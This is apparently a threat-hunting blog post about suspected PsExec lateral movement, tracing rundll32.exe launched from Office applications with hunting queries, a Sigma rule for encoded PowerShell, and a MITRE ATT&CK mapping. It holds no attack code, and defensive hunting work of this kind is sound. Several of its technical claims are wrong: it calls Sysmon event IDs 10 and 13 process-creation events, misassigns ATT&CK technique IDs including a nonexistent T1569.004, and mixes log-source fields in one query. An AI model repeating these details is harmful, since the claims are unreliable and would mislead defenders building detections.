Investigating PsExec Lateral Movement Activity

Posted on: Last updated on: Written by:

Investigating PsExec Lateral Movement Activity

Why This Activity Stood Out

During a routine review of our security telemetry, we noticed an unusual spike in process creation events originating from the Office365 environment. The Sysmon logs flagged several instances of rundll32.exe with command-line arguments that looked suspiciously similar to those used for remote execution via PsExec. Given the context of recent Wizard Spider attacks, this activity was a red flag as it could indicate an adversary leveraging these tools for lateral movement.

Initial Hunt Logic

Our initial hypothesis was that an adversary might be using PsExec or similar tools to move laterally within our network, using Office365 endpoints as stepping stones. We leveraged telemetry from Sysmon and other endpoint and network logs to gather the necessary data points for this investigation.

Reviewing Process Lineage

KQL Hunting Reference

DeviceProcessEvents
| where FileName =~ "rundll32.exe"
| project Timestamp, DeviceName, InitiatingProcessCommandLine

SPL Hunting Reference

index=sysmon Image="*rundll32.exe"
| stats count by Computer, CommandLine

These queries helped us identify multiple instances of rundll32.exe being executed with suspicious arguments. We decided to dig deeper into the process lineage and parent-child relationships to understand how these processes were initiated.

Expanding the Investigation

Process Tree Analysis

We used Sysmon’s event IDs 10 and 13 for detailed process creation and termination events. By examining the InitiatingProcessCommandLine and NewProcessName fields, we could trace back to the parent processes that triggered these suspicious executions.

Sysmon
| where EventID in (10, 13)
| project DeviceName, InitiatingProcessCommandLine, NewProcessName, ProcessGuid, CommandLine

Finding Suspicious Patterns

Several patterns emerged:

  • Unexpected Parent Processes: Some rundll32.exe executions were initiated by Office applications like Excel or Word.
  • Complex Command Lines: The command lines often contained encoded PowerShell scripts and other obfuscation techniques.

Detection Opportunities

To better detect such lateral movement activities, we considered enhancing our existing detections. Here’s a proposed Sigma rule to identify suspicious rundll32.exe executions:

title: Suspicious Encoded PowerShell

logsource:
  category: process_creation

detection:
  selection:
    CommandLine|contains:
      - '-enc'
      - 'EncodedCommand'

condition: selection

level: high

Analyst Notes

Process Lineage Analysis

We observed that some rundll32.exe executions were spawned by legitimate Office applications, which made them less suspicious on the surface. However, deeper analysis revealed that these processes often had complex command lines with encoded pay-loads.

Suspicious Behavior vs False Positives

Some normal business operations could also trigger similar behavior:

  • Office Automation: Developers or power users might automate certain tasks using rundll32.exe and PowerShell.
  • Backup Tools: Some backup solutions use rundll32.exe for file system interactions.

To mitigate false positives, we decided to implement additional checks such as verifying the presence of known good indicators like PowerShell modules or specific libraries in the path.

Telemetry Blind Spots

While Sysmon provided detailed process events, there were still some gaps:

  • Network Traffic: The exact nature of data being transferred during these executions was not always visible.
  • Registry Changes: Modifications to the registry by malicious processes might have been missed without additional logging.

Operational Challenges

Limitations of Detections

Our initial detection focused on rundll32.exe command lines, but it’s crucial to consider other lateral movement tools and techniques. We need to stay vigilant and continuously refine our detections.

Realistic Troubleshooting

We encountered issues with false positives due to the complexity of legitimate business processes. To address this, we decided to implement a multi-layered approach:

  • Baseline Analysis: Establishing a baseline for normal Office application behavior.
  • Behavioral Anomalies: Identifying deviations from expected behavior.

MITRE ATT&CK Mapping

T1569 Lateral Movement

T1569.002 Remote Services

Description: Adversaries may use remote services to establish a foothold on other systems and gain access to resources they would otherwise not have.

  • Sysmon Event IDs 10, 13: Used for detecting process creation.
  • Service Creation Logs: Analyzing service creation events can reveal attempts to create malicious services that might aid in lateral movement.

T1569.004 Admin Shares

Description: Adversaries may use admin shares (e.g., \\ComputerName\IPC$) for remote access and data exfiltration.

  • SMB Logs: Monitoring SMB activity can help detect unauthorized access to admin shares.
  • 4624 Logon Events: Reviewing logon events might reveal suspicious activities related to administrative privileges.

Practical Detection Recommendations

  1. Enhance Sigma Rules:

    • Expand the Sigma rule for rundll32.exe executions to include additional checks like file hashes and module loading.

  2. Implement Multi-Layered Detection:

    • Use a combination of Sysmon, WMI event logs, and PowerShell scripts to monitor for suspicious activities.

  3. Continuous Monitoring:

    • Set up real-time alerts for unusual command-line arguments and process creation events.

  4. Behavioral Analysis:

    • Develop heuristics based on normal business operations to reduce false positives.

Telemetry Improvement Ideas

  1. Enable Detailed SMB Logging:

    • Enable SMB logging with extended properties to capture more details about data transfer.

  2. Increase Sysmon Coverage:

    • Consider adding more event IDs for better process and network activity monitoring.

  3. Implement Endpoint Detection and Response (EDR):

    • Use EDR tools that offer deeper insights into process behavior and network communications.

Operational Observations

  • Telemetry Quality: The quality of telemetry is crucial, but it can be limited by the configuration and settings in place.
  • User Education: Training users on recognizing suspicious activities can help reduce false alarms.
  • Incident Response: A well-defined incident response plan ensures quick and effective handling of potential threats.

Hashtags Relevant to the Hunt Topic

PsExec #LateralMovement #WizardSpider #SMB #Sysmon #EndpointProtection #TelemetryGaps #ProcessCreation #SecurityHunting #ThreatHunter #MITREATT&CK

This investigation provided valuable insights into how adversaries can use legitimate tools for malicious purposes. By refining our detection methods and continuously monitoring our environment, we can better protect against such threats.

#ThreatHunting #CyberSecurity #BlueTeam #SOC #DetectionEngineering #MITREATTACK #LateralMovement #Windows #PsExecLateralMovement